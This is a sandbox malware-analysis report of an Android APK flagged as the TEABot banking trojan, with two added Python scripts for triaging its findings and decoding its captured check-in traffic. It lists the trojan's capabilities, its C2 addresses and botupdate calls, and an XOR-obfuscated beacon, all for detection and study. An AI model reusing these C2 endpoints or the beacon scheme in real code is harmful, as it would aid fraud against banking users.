
Android Analysis Report MediaPlayer.apk

Overview

General Information

Sample Name: MediaPlayer.apk
Analysis ID: 1532822
MD5: b694ba8bf9c8d2b9cfde8c20c76c4716
SHA1: 1efda35ec2906e532c11f1be0bb55b88ea787b2d
SHA256: 89e5746d0903777ef68582733c777b9ee53c42dc4d64187398e1131cccfc0599

Detection

TEABot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected TEABot
Found detection on Joe Sandbox Cloud Basic
Multi AV Scanner detection for submitted file
Accesses the class loader (often done to load new code)
Accesses FileOutputStream via Reflection
Contains a screen recorder (to take screenshots)
Drops a new dex file
Loads new DEX files via dynamic constructor
May check for installed Android security applications (AV and firewalls)
Performs DNS queries to domains with low reputation
Protects itself from removal
Removes its application launcher (likely to stay hidden)
Requests to ignore battery optimizations
Starts/registers a service/receiver on screen off
Uses accessibility services (likely to control other applications)
Aborts a broadcast event (this is often done to hide phone events such as incoming SMS)
Accesses /proc
Accesses android OS build fields
Checks CPU details
Checks an internet connection is available
Creates SMS data (e.g. PDU)
Executes native commands
Found suspicious command strings (may be related to BOT commands)
Found very long method strings
Has permission to draw over other applications or user interfaces
Has permission to execute code after phone reboot
Has permission to read the SMS storage
Has permission to read the phone's state (phone number, device IDs, active call etc.)
Has permission to receive SMS in the background
Has permission to send SMS in the background
Has permission to terminate background processes of other applications
Has permission to write to the SMS storage
Has permissions to create, read or change account settings (including account password settings)
Installs a new wake lock (to keep the device awake)
May access the Android keyguard (lock screen)
May check for popular installed apps
Modifies the audio routing behavior
Monitors incoming SMS
Obfuscates method names
Opens an internet connection
Parses SMS data (e.g. originating address)
Performs DNS lookups (Java API)
Queries a list of installed applications
Queries camera information
Queries list of running processes/tasks
Queries media storage location field
Queries several pieces of sensitive phone information
Queries stored mail and application accounts (e.g. Gmail or WhatsApp)
Queries the list of paired Bluetooth devices
Queries the network MAC address
Queries the network operator ISO country code
Queries the unique operating system id (ANDROID_ID)
Records audio/media
Redirects camera/video feed
Requests potentially dangerous permissions
Requests root access
Uses WebRTC (often used for remote VNC)
Uses reflection

Yara Overview

No yara matches

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: MediaPlayer.apk | Avira: detected
Multi AV Scanner detection for submitted file
Source: MediaPlayer.apk | VirusTotal: Detection: 55%
Source: MediaPlayer.apk | ReversingLabs: Detection: 55%
Requests root access
Source: Lpiuk/blockchain/android/util/RootUtil;->checkPaths()Z | Method string: "/system/bin/su"
Source: Lpiuk/blockchain/android/util/RootUtil;->checkPaths()Z | Method string: "/system/xbin/su"
Queries the list of paired Bluetooth devices
Source: org.appspot.apprtc.AppRTCBluetoothManager;->r:166 | API Call: android.bluetooth.BluetoothAdapter.getBondedDevices
Uses WebRTC (often used for remote VNC)
Source: Lorg/webrtc/Camera1Enumerator;->enumerateFormats(I)Ljava/util/List; | Method string: WebRTC strings
Queries media storage location field
Source: org.appspot.apprtc.PeerConnectionClient;->M:89 | API Call: android.os.Environment.getExternalStorageDirectory
Source: org.appspot.apprtc.PeerConnectionClient;->P:214 | API Call: android.os.Environment.getExternalStorageDirectory
Source: com.facebook.cache.disk.DefaultDiskStorage;->isExternal:69 | API Call: android.os.Environment.getExternalStorageDirectory
Source: com.facebook.common.statfs.StatFsHelper;->ensureInitialized:9 | API Call: android.os.Environment.getExternalStorageDirectory
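Joe Sandbox attributes each hit to the method it fired in, and in this sample those methods are split between the bot's own renamed package (cabbage.grace.solid, which carries the TEABot strings, the C2 connection and the screen capture further down the report) and bundled third-party code (org.webrtc, org.appspot.apprtc, com.facebook and piuk.blockchain in this section alone). Sorting hits by namespace before writing detections keeps library behaviour, such as the su-path check in piuk.blockchain.android.util.RootUtil, from being mistaken for bot behaviour. The script below is an added example, not code from the report or from the sample: the input lines are copied from the report in the raw form the extraction produced (detail text running straight on after the method reference), while the package-to-library table and the cabbage.grace.solid attribution are assumptions of the example.

```python
"""Bucket a Joe Sandbox report's "Source:" hits by package namespace.

Added example, not code from the report or the sample. Assumes the bot's own
code lives under cabbage.grace.solid (as the report's TEABot, C2 and
screen-capture hits suggest) and that LIBRARY_PREFIXES names the bundled
libraries correctly; both are assumptions of this example.
"""
import re
from collections import defaultdict

# Lines copied from the report in the raw form the extraction produced
# (the detail text runs straight on after the method reference).
SAMPLE_REPORT_LINES = [
    'Source: MediaPlayer.apkAvira: detected',
    'Source: Lpiuk/blockchain/android/util/RootUtil;->checkPaths()ZMethod string: "/system/bin/su"',
    'Source: org.appspot.apprtc.AppRTCBluetoothManager;->r:166API Call: android.bluetooth.BluetoothAdapter.getBondedDevices',
    'Source: com.facebook.cache.disk.DefaultDiskStorage;->isExternal:69API Call: android.os.Environment.getExternalStorageDirectory',
    'Source: cabbage.grace.solid.util.g;->b:30API Call: java.net.URL.openConnection("http://185.215.113.31:80/api/botupdate")',
    'Source: Lcabbage/grace/solid/jd98awdAWHndoia;->i()VMethod: getDisplayMetrics and createVirtualDisplay',
    'Source: Lb/a/a/a/c/r;->c(Landroid/content/Context;)IMethod string: "com.android.vending"',
    'Source: org.webrtc.voiceengine.WebRtcAudioRecord;->startRecording:209API Call: android.media.AudioRecord.startRecording',
    'Source: piuk.blockchain.android.util.RootUtil;->checkSu:19API Call: java.lang.Runtime.exec',
]

APP_PACKAGE = "cabbage.grace.solid"  # assumption: the bot's own (renamed) package

# Assumption: well-known open-source / vendor namespaces bundled in the APK.
LIBRARY_PREFIXES = {
    "org.webrtc": "WebRTC",
    "org.appspot.apprtc": "WebRTC AppRTC demo client",
    "com.facebook": "Facebook (Fresco image pipeline)",
    "com.google.firebase": "Firebase",
    "com.google.android.gms": "Google Play services",
    "piuk.blockchain": "Blockchain.com wallet",
    "com.coinbase.android": "Coinbase",
    "org.xbill.DNS": "dnsjava",
    "org.ccil.cowan.tagsoup": "TagSoup",
}

# Either a dotted class (org.webrtc.Foo;->bar:12) or a smali descriptor
# (Lorg/webrtc/Foo;->bar()V): both end the class name with ";->".
SOURCE_RE = re.compile(r"Source:\s*(?P<cls>[^\s;]+);->")


def normalize_class(cls: str) -> str:
    """Turn a smali descriptor into dotted form; leave dotted names alone."""
    if "/" in cls and cls.startswith("L"):
        cls = cls[1:]
    return cls.replace("/", ".")


def classify(cls: str) -> str:
    """Attribute a class to the sample, a known library, or neither."""
    if cls == APP_PACKAGE or cls.startswith(APP_PACKAGE + "."):
        return "sample's own code"
    for prefix, name in LIBRARY_PREFIXES.items():
        if cls == prefix or cls.startswith(prefix + "."):
            return name
    # Every component one or two characters long: ProGuard/R8-style renaming.
    if all(len(part) <= 2 for part in cls.split(".")):
        return "obfuscated, unattributed"
    return "unattributed"


def bucket_findings(lines):
    """Map attribution bucket -> normalized class names of the hits."""
    buckets = defaultdict(list)
    for line in lines:
        match = SOURCE_RE.search(line)
        if match is None:
            # Whole-file hits (AV verdicts, permissions) carry no method.
            buckets["no method source"].append(line.strip())
            continue
        cls = normalize_class(match.group("cls"))
        buckets[classify(cls)].append(cls)
    return dict(buckets)


if __name__ == "__main__":
    for bucket, hits in sorted(bucket_findings(SAMPLE_REPORT_LINES).items()):
        print(f"{bucket}: {len(hits)}")
        for hit in hits:
            print(f"    {hit}")
```

Feed it the whole cleaned report and the "sample's own code" bucket is the set of behaviours worth turning into signatures; the single-letter package b.a.a.a.c.r is a reminder that obfuscated helper code can belong to either side and needs a manual look.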

Networking:

Performs DNS queries to domains with low reputation
Source: DNS query: kopozkapalo.xyz
Source: DNS query: sepoloskotop.xyz
Checks an internet connection is available
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getDefaultNetId:71 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getDefaultNetId:75 | API Call: android.net.ConnectivityManager.getNetworkInfo
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getNetworkState:92 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getNetworkState:96 | API Call: android.net.ConnectivityManager.getNetworkInfo
Source: org.webrtc.NetworkMonitorAutoDetect$ConnectivityManagerDelegate;->getNetworkState:98 | API Call: android.net.NetworkInfo.isConnected
Opens an internet connection
Source: cabbage.grace.solid.util.g;->b:30 | API Call: java.net.URL.openConnection("http://185.215.113.31:80/api/botupdate")
Source: cabbage.grace.solid.util.g;->b:30 | API Call: java.net.URL.openConnection("http://kopozkapalo.xyz:80/api/botupdate")
Source: cabbage.grace.solid.util.g;->b:30 | API Call: java.net.URL.openConnection("http://sepoloskotop.xyz:80/api/botupdate")
Source: cabbage.grace.solid.e;->a:12 | API Call: java.net.Socket.connect (not executed)
Source: cabbage.grace.solid.util.g;->a:2 | API Call: java.net.URL.openConnection (not executed)
Source: cabbage.grace.solid.util.g;->c:67 | API Call: java.net.URL.openConnection (not executed)
Source: org.ccil.cowan.tagsoup.Parser;->getInputStream:126 | API Call: java.net.URL.openConnection (not executed)
Performs DNS lookups (Java API)
Source: cabbage.grace.solid.util.b;->n:140 | API Call: java.net.InetAddress.getByName (URL: "google.com")
Source: org.xbill.DNS.SimpleResolver;-><init>:9 | API Call: java.net.InetAddress.getByName (not executed)
Source: unknown | TCP traffic detected without corresponding DNS query: 216.58.214.234
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.31 (43 consecutive connections; identical lines collapsed)
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.185.196 (2 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.31 (4 further connections)
Source: unknown | DNS traffic detected: queries for: kopozkapalo.xyz
Source: unknown | HTTP traffic detected:
POST /api/botupdate HTTP/1.1
Accept-Charset: UTF-8
Content-Type: application/xml
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)
Host: 185.215.113.31
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 554
Data Raw: 39 60 26 23 36 23 1d 37 32 26 23 36 27 60 78 39 60 2a 35 2b 26 60 78 60 27 76 77 27 74 74 72 73 7b 24 23 73 7b 76 70 7a 60 6e 60 26 27 34 2b 21 27 1d 2c 23 2f 27 60 78 60 23 2f 31 37 2c 25 62 05 23 2e 23 3a 3b 62 0c 27 3a 37 31 60 6e 60 32 2a 2d 2c 27 1d 2c 37 2f 20 27 30 60 78 60 2c 2d 62 32 2a 2d 2c 27 60 6e 60 20 23 36 36 27 30 3b 1d 2e 27 34 27 2e 60 78 60 73 72 72 60 6e 60 23 21 31 1d 27 2c 23 20 2e 27 26 60 78 24 23 2e 31 27 6e 60 26 2d 38 27 1d 27 2c 23 20 2e 27 26 60 78 24 23 2e 31 27 6e 60 21 2d 37 2c 36 30 3b 60 78 60 37 2c 29 2c 2d 35 2c 60 6e 60 2e 2d 21 23 2e 27 60 78 60 27 2c 1d 37 31 60 6e 60 31 21 30 27 27 2c 1d 23 21 36 2b 34 27 60 78 36 30 37 27 6e 60 31 21 30 27 27 2c 1d 31 27 21 37 30 27 60 78 24 23 2e 31 27 6e 60 31 2f 31 1d 2f 23 2c 23 25 27 30 60 78 60 36 30 2d 37 20 2e 27 6c 21 23 2c 3b 2d 2c 6c 34 23 2c 60 6e 60 23 2c 26 30 2d 2b 26 1d 34 27 30 31 2b 2d 2c 60 78 70 77 6e 60 21 37 30 30 27 2c 36 1d 2e 2d 25 25 27 26 1d 32 23 31 31 35 2d 30 26 60 78 60 60 6e 60 34 27 30 60 78 74 3f 6e 60 2e 2d 25 25 27 26 1d 31 2f 31 60 78 19 1f 6e 60 2e 2d 25 25 27 26 1d 32 37 31 2a 27 31 60 78 19 1f 6e 60 31 3b 31 36 27 2f 1d 2e 2d 25 31 60 78 19 60 70 72 70 73 6f 72 75 6f 70 7b 62 73 72 78 70 7b 7f 7c 11 36 23 30 36 62 34 70 73 62 2d 2c 62 26 2d 2f 23 2b 2c 31 62 14 0e 01 62 0f 27 26 2b 23 12 2e 23 3b 27 30 60 6e 60 70 72 70 73 6f 72 75 6f 70 7b 62 73 72 78 70 7b 7f 7c 0b 2c 31 36 23 2e 2e 27 26 62 23 21 21 27 31 31 2b 20 2b 2e 2b 36 3b 62 31 27 30 34 2b 21 27 31 62 2c 37 2e 2e 60 1f 6e 60 21 23 32 36 37 30 27 26 1d 2b 2c 28 27 21 36 31 60 78 19 1f 6e 60 21 2d 2f 32 2e 27 36 27 26 1d 21 2d 2f 2f 23 2c 26 31 60 78 19 1f 3f
Data Ascii: 9`&#6#72&#6'`x9`*5+&`x`'vw'ttrs{$#s{vpz`n`&'4+!',#/'`x`#/17,%b#.#:;b':71`n`2*-,',7/ '0`x`,-b2*-,'`n` #66'0;.'4'.`x`srr`n`#!1',# .'&`x$#.1'n`&-8'',# .'&`x$#.1'n`!-7,60;`x`7,),-5,`n`.-!#.'`x`',71`n`1!0'',#!6+4'`x607'n`1!0'',1'!70'`x$#.1'n`1/1/#,#%'0`x`60-7 .'l!#,;-,l4#,`n`#,&0-+&4'01+-,`xpwn`!700',6.-%%'&2#115-0&`x``n`4'0`xt?n`.-%%'&1/1`xn`.-%%'&271*'1`xn`1;16'/.-%1`x`prpsoruop{bsrxp{|6#06b4psb-,b&-/#+,1bb'&+#.#;'0`n`prpsoruop{bsrxp{|,16#..'&b#!!'11+ +.+6;b1'04+!'1b,7..`n`!#2670'&+,('!61`xn`!-/2.'6'&!-//#,&1`x?
Source: rA.json.dr | String found in binary or memory: http://185.215.113.31:80/api/
Source: android | String found in binary or memory: http://185.215.113.31:80/api/botupdate
Source: login.js | String found in binary or memory: http://54.237.29.75:8080/pbank/personetics/execute
Source: akbankdirektode.cer | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: akbankdirektmobil.cer | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: index.html | String found in binary or memory: http://code.google.com/p/zxing
Source: akbankdirektode.cer | String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: akbankdirektmobil.cer | String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: akbankdirektode.cer | String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: akbankdirektmobil.cer | String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: error.js | String found in binary or memory: http://eriwen.com/
Source: fontawesome-webfont.ttf | String found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Webfont
Source: oksymbol.ttf | String found in binary or memory: http://fontello.com
Source: oksymbol.ttf | String found in binary or memory: http://fontello.comGenerated
Source: error.js | String found in binary or memory: http://kinsey.no/blog
Source: rA.json.dr | String found in binary or memory: http://kopozkapalo.xyz:80/api/
Source: android | String found in binary or memory: http://kopozkapalo.xyz:80/api/botupdate
Source: error.js | String found in binary or memory: http://lucassmith.name/
Source: akbankdirektmobil.cer | String found in binary or memory: http://ocsp.digicert.com0F
Source: akbankdirektode.cer | String found in binary or memory: http://ocsp.digicert.com0R
Source: classes.dex, android | String found in binary or memory: http://pest.w3.org/
Source: $ic_launcher_foreground__0.xml | String found in binary or memory: http://schemas.android.com/aapt
Source: acsakpoaskopaj.xml, ic_launcher.xml | String found in binary or memory: http://schemas.android.com/apk/res/android
Source: classes.dex, android | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: classes.dex, android | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: rA.json.dr | String found in binary or memory: http://sepoloskotop.xyz:80/api/
Source: android | String found in binary or memory: http://sepoloskotop.xyz:80/api/botupdate
Source: mobuygakbankcom.cer | String found in binary or memory: http://ss.symcb.com/ss.crl0a
Source: mobuygakbankcom.cer | String found in binary or memory: http://ss.symcb.com/ss.crt0
Source: mobuygakbankcom.cer | String found in binary or memory: http://ss.symcd.com0&
Source: OpenSans-Regular.ttf | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: OpenSans-Regular.ttf | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0Digitized
Source: OpenSans-Regular.ttf | String found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/bogons-empty
Source: classes.dex | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/bogons-empty:http://www.ccil.org/~cowan/tagsoup/features
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/cdata-elements
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/default-attributes
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/ignorable-whitespace
Source: classes.dex | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/ignorable-whitespace9http://www.ccil.org/~cowan/tagsoup/
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/ignore-bogons
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/restart-elements
Source: classes.dex | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/restart-elements7http://www.ccil.org/~cowan/tagsoup/feat
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/root-bogons
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/translate-colons
Source: classes.dex | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/features/translate-colons;http://www.ccil.org/~cowan/tagsoup/prop
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/properties/auto-detector
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/properties/scanner
Source: classes.dex, android | String found in binary or memory: http://www.ccil.org/~cowan/tagsoup/properties/schema
Source: classes.dex, android | String found in binary or memory: http://www.cs.caltech.edu/~adam/
Source: classes.dex, android | String found in binary or memory: http://www.cs.caltech.edu/~adam/schemas/bCard
Source: classes.dex | String found in binary or memory: http://www.slf4j.org/codes.html
Source: classes.dex, android | String found in binary or memory: http://www.slf4j.org/codes.html#StaticLoggerBinder
Source: classes.dex, android | String found in binary or memory: http://www.slf4j.org/codes.html#loggerNameMismatch
Source: classes.dex, android | String found in binary or memory: http://www.slf4j.org/codes.html#multiple_bindings
Source: classes.dex, android | String found in binary or memory: http://www.slf4j.org/codes.html#no_static_mdc_binder
Source: classes.dex | String found in binary or memory: http://www.slf4j.org/codes.html#null_LF
Source: classes.dex | String found in binary or memory: http://www.slf4j.org/codes.html#null_LF)http://www.slf4j.org/codes.html#null_MDCA&http://www.slf4j.o
Source: classes.dex, android | String found in binary or memory: http://www.slf4j.org/codes.html#null_MDCA
Source: classes.dex, android | String found in binary or memory: http://www.slf4j.org/codes.html#replay
Source: classes.dex | String found in binary or memory: http://www.slf4j.org/codes.html#replay9See
Source: classes.dex, android | String found in binary or memory: http://www.slf4j.org/codes.html#substituteLogger
Source: classes.dex | String found in binary or memory: http://www.slf4j.org/codes.html#substituteLoggerKSee
Source: classes.dex | String found in binary or memory: http://www.slf4j.org/codes.html#unsuccessfulInit
Source: classes.dex, android | String found in binary or memory: http://www.slf4j.org/codes.html#version_mismatch
Source: classes.dex | String found in binary or memory: http://www.slf4j.org/codes.html2http://www.slf4j.org/codes.html#StaticLoggerBinder2http://www.slf4j.
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/is-standalone
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/lexical-handler/parameter-entities
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/namespaces
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/resolve-dtd-uris
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/string-interning
Source: classes.dex | String found in binary or memory: http://xml.org/sax/features/unicode-normalization-checking
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/use-attributes2
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/use-locator2
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/validation
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/xml-1.1
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/features/xmlns-uris
Source: classes.dex, android | String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: sharing.html | String found in binary or memory: http://zxing.appspot.com/generator/
Source: classes.dex | String found in binary or memory: https://algoexplorer.io/tx/
Source: classes.dex | String found in binary or memory: https://algoexplorer.io/tx/$https://blockchain.com/legal/privacy0https://exchange-support.blockchain
Source: liba7ba0c.so | String found in binary or memory: https://android.googlesource.com/toolchain/clang
Source: liba7ba0c.so | String found in binary or memory: https://android.googlesource.com/toolchain/llvm
Source: libcrashlytics.so | String found in binary or memory: https://android.googlesource.com/toolchain/llvm-project
Source: classes.dex, android | String found in binary or memory: https://blockchain.com/legal/privacy
Source: mobuygakbankcom.cer | String found in binary or memory: https://d.symcb.com/cps0%
Source: mobuygakbankcom.cer | String found in binary or memory: https://d.symcb.com/rpa0
Source: classes.dex, android | String found in binary or memory: https://exchange-support.blockchain.com/hc/en-us
Source: classes.dex | String found in binary or memory: https://exchange.blockchain.com
Source: classes.dex, android | String found in binary or memory: https://exchange.blockchain.com/?utm_source=android_wallet&utm_medium=wallet_linking
Source: classes.dex, android | String found in binary or memory: https://exchange.blockchain.com/trade/link/
Source: classes.dex | String found in binary or memory: https://exchange.blockchain.comThttps://exchange.blockchain.com/?utm_source=android_wallet&utm_mediu
Source: classes.dex | String found in binary or memory: https://login.blockchain.com/
Source: rA.json.dr | String found in binary or memory: https://plus.google.com/
Source: rA.json.dr | String found in binary or memory: https://plus.google.com/%https://www.googleapis.com/auth/games
Source: classes.dex | String found in binary or memory: https://stellarchain.io/tx/
Source: classes.dex | String found in binary or memory: https://stellarchain.io/tx/Nhttps://support.blockchain.com/hc/en-us/articles/360000939903-Transactio
Source: classes.dex, android | String found in binary or memory: https://support.blockchain.com/hc/en-us/articles/360000939903-Transaction-fees
Source: classes.dex, android | String found in binary or memory: https://support.blockchain.com/hc/en-us/articles/360019105471-Why-do-Stellar-addresses-have-a-minimu
Source: classes.dex, android | String found in binary or memory: https://www.blockchain-status.com
Source: classes.dex, android | String found in binary or memory: https://www.blockchain.com/bch/tx/
Source: classes.dex, android | String found in binary or memory: https://www.blockchain.com/btc/tx/
Source: classes.dex, android | String found in binary or memory: https://www.blockchain.com/eth/tx/
Source: classes.dex | String found in binary or memory: https://www.blockchain.com/eth/tx/-https://www.blockchain.com/legal/borrow-terms
Source: classes.dex, android | String found in binary or memory: https://www.blockchain.com/legal/borrow-terms
Source: akbankdirektode.cer | String found in binary or memory: https://www.digicert.com/CPS0
Source: rA.json.dr, android | String found in binary or memory: https://www.googleapis.com/auth/games
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 36710
Source: unknown | Network traffic detected: HTTP traffic on port 36710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52144 -> 443
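The POST to /api/botupdate captured above is the bot's check-in. Its Content-Type header says application/xml, but the body is not XML: every byte has been XOR-ed with one key. The script below is an added example (not code from the report or from the sample) that recovers that key by brute force, using json.loads as the oracle rather than a printable-ASCII score, because several neighbouring keys also turn this particular ciphertext into printable characters. The hex is copied from the report's Data Raw field; the single-byte-XOR and JSON-plaintext assumptions are the example's own and happen to hold for this capture (the oracle settles on 0x42 and the plaintext is a JSON object opening with data_update). On a capture where they do not hold, recover_key returns None and the fallback keeps only the guess that the plaintext starts with an opening brace.

```python
"""Recover the XOR key of the captured /api/botupdate POST body and parse it.

Added example, not code from the sandbox report or from the sample. It
assumes the body is JSON obfuscated with a single-byte XOR key; both
assumptions are checked at run time by the brute force below.
"""
import json
from typing import Optional, Tuple

# POST body copied from the report's "Data Raw" field (Content-Length: 554).
CAPTURED_BODY_HEX = """
39 60 26 23 36 23 1d 37 32 26 23 36 27 60 78 39
60 2a 35 2b 26 60 78 60 27 76 77 27 74 74 72 73 7b 24 23 73 7b 76 70 7a 60 6e
60 26 27 34 2b 21 27 1d 2c 23 2f 27 60 78 60 23 2f 31 37 2c 25 62 05 23 2e 23 3a 3b 62 0c 27 3a 37 31 60 6e
60 32 2a 2d 2c 27 1d 2c 37 2f 20 27 30 60 78 60 2c 2d 62 32 2a 2d 2c 27 60 6e
60 20 23 36 36 27 30 3b 1d 2e 27 34 27 2e 60 78 60 73 72 72 60 6e
60 23 21 31 1d 27 2c 23 20 2e 27 26 60 78 24 23 2e 31 27 6e
60 26 2d 38 27 1d 27 2c 23 20 2e 27 26 60 78 24 23 2e 31 27 6e
60 21 2d 37 2c 36 30 3b 60 78 60 37 2c 29 2c 2d 35 2c 60 6e
60 2e 2d 21 23 2e 27 60 78 60 27 2c 1d 37 31 60 6e
60 31 21 30 27 27 2c 1d 23 21 36 2b 34 27 60 78 36 30 37 27 6e
60 31 21 30 27 27 2c 1d 31 27 21 37 30 27 60 78 24 23 2e 31 27 6e
60 31 2f 31 1d 2f 23 2c 23 25 27 30 60 78 60 36 30 2d 37 20 2e 27 6c 21 23 2c 3b 2d 2c 6c 34 23 2c 60 6e
60 23 2c 26 30 2d 2b 26 1d 34 27 30 31 2b 2d 2c 60 78 70 77 6e
60 21 37 30 30 27 2c 36 1d 2e 2d 25 25 27 26 1d 32 23 31 31 35 2d 30 26 60 78 60 60 6e
60 34 27 30 60 78 74 3f 6e
60 2e 2d 25 25 27 26 1d 31 2f 31 60 78 19 1f 6e
60 2e 2d 25 25 27 26 1d 32 37 31 2a 27 31 60 78 19 1f 6e
60 31 3b 31 36 27 2f 1d 2e 2d 25 31 60 78 19
60 70 72 70 73 6f 72 75 6f 70 7b 62 73 72 78 70 7b 7f 7c 11 36 23 30 36 62 34 70 73 62 2d 2c 62 26 2d 2f 23 2b 2c 31 62 14 0e 01 62 0f 27 26 2b 23 12 2e 23 3b 27 30 60 6e
60 70 72 70 73 6f 72 75 6f 70 7b 62 73 72 78 70 7b 7f 7c 0b 2c 31 36 23 2e 2e 27 26 62 23 21 21 27 31 31 2b 20 2b 2e 2b 36 3b 62 31 27 30 34 2b 21 27 31 62 2c 37 2e 2e 60 1f 6e
60 21 23 32 36 37 30 27 26 1d 2b 2c 28 27 21 36 31 60 78 19 1f 6e
60 21 2d 2f 32 2e 27 36 27 26 1d 21 2d 2f 2f 23 2c 26 31 60 78 19 1f 3f
"""


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same single-byte key."""
    return bytes(b ^ key for b in data)


def recover_key(data: bytes) -> Optional[int]:
    """Try all 256 keys; return the first whose output parses as JSON.

    A printable-ASCII score is not a sufficient oracle for this body: keys
    such as 0x41 or 0x43 also map every ciphertext byte onto a printable
    character. Requiring the output to be well-formed JSON is far stricter.
    """
    for key in range(256):
        candidate = xor_bytes(data, key).decode("latin-1")
        try:
            json.loads(candidate)
        except ValueError:  # JSONDecodeError is a ValueError
            continue
        return key
    return None


def decode_botupdate(hex_body: str) -> Tuple[int, str, Optional[dict]]:
    """Return (key, plaintext, parsed JSON or None) for a captured body."""
    data = bytes.fromhex(hex_body)
    key = recover_key(data)
    if key is None:
        # Fallback for a damaged or differently obfuscated capture: assume
        # only that the plaintext is a JSON object and so starts with '{'.
        key = data[0] ^ ord("{")
        return key, xor_bytes(data, key).decode("latin-1"), None
    text = xor_bytes(data, key).decode("latin-1")
    return key, text, json.loads(text)


def summarize(parsed: dict) -> dict:
    """Pull the fields a triage note would cite from a parsed beacon."""
    device = parsed.get("data_update", {})
    return {
        "hwid": device.get("hwid"),
        "android_version": device.get("android_version"),
        "sms_manager": device.get("sms_manager"),
        "logged_sms": len(parsed.get("logged_sms", [])),
        "captured_injects": len(parsed.get("captured_injects", [])),
        "completed_commands": len(parsed.get("completed_commands", [])),
    }


if __name__ == "__main__":
    key, text, parsed = decode_botupdate(CAPTURED_BODY_HEX)
    print(f"key = 0x{key:02x}")
    print(text)
    if parsed is not None:
        print(summarize(parsed))
```

The decoded beacon carries a device fingerprint (hwid, device_name, android_version, locale, battery level), the package currently set as default SMS handler, a system_logs array with the bot's own start-up messages, and empty logged_sms, captured_injects and completed_commands arrays for a fresh install. Two of those names, logged_sms and captured_injects, also appear as SharedPreferences keys of cabbage.grace.solid.j.a in the System Summary section, which ties this traffic to that class without a disassembler.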

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains a screen recorder (to take screenshots)
Source: Lcabbage/grace/solid/jd98awdAWHndoia;->i()V | Method: getDisplayMetrics and createVirtualDisplay
Modifies the audio routing behavior
Source: org.appspot.apprtc.AppRTCAudioManager;->p:127 | API Call: android.media.AudioManager.setMode
Source: org.appspot.apprtc.AppRTCAudioManager;->q:151 | API Call: android.media.AudioManager.setMode
Records audio/media
Source: org.webrtc.voiceengine.WebRtcAudioRecord;->startRecording:209 | API Call: android.media.AudioRecord.startRecording
Source: org.webrtc.voiceengine.WebRtcAudioRecord;->initRecording:101 | API Call: android.media.AudioRecord.<init>

E-Banking Fraud:

Detected TEABot
Source: Lcabbage/grace/solid/h/r;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)V | Method string: TEABot strings
May check for popular installed apps
Source: Lb/a/a/a/c/r;->c(Landroid/content/Context;)I | Method string: "com.android.vending"
